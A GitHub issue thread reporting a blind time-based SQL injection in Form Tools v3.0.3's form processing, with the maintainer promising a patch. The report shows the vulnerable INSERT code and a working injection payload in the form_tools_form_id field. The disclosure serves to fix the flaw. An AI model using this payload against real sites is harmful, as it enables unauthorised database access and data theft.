### ISSUE TITLE
SQL injection in processing forms

### ISSUE THREAD

**Issue by Unbrick** [formtools/core#627]
While testing a website with the installed formtools framework (v3.0.3) a blind time based SQL injection in the process.php was found, processing forms using the Submissions.php. 
The [vulnerable code in the Submissions.php](https://github.com/formtools/core/blob/master/src/global/code/Submissions.class.php#L194) at the moment looks like this:

```
$db->query("
                    INSERT INTO {PREFIX}form_$form_id ($col_names_str) -- 
                    VALUES ($placeholders_str)
                ");
```

By posting the query

```
form_tools_form_id=5+(submission_date)+SELECT+(IF(@@USER LIKE '',SLEEP(10),SLEEP(0)));%00
```

the query executed on the database resulted in 

```
INSERT INTO form_5 (submission_date) SELECT (IF(@@USER LIKE '', SLEEP(10), SLEEP(0))); --
```

which allowed the attacker to exfiltrate data. Despite looking strange the [INSERT INTO SELECT](https://www.w3schools.com/sql/sql_insert_into_select.asp) is a valid SQL syntax.

**Comment by benkeen** [comment]
Hmm, thanks very much for letting me know. Form Tools 3 moved to PDO which greatly reduces the likelihood of SQL injection attacks since it cleanses all params in the queries. In this instance, however, I see it's constructing parts of the SQL statement manually.

I'll patch this in the next release.
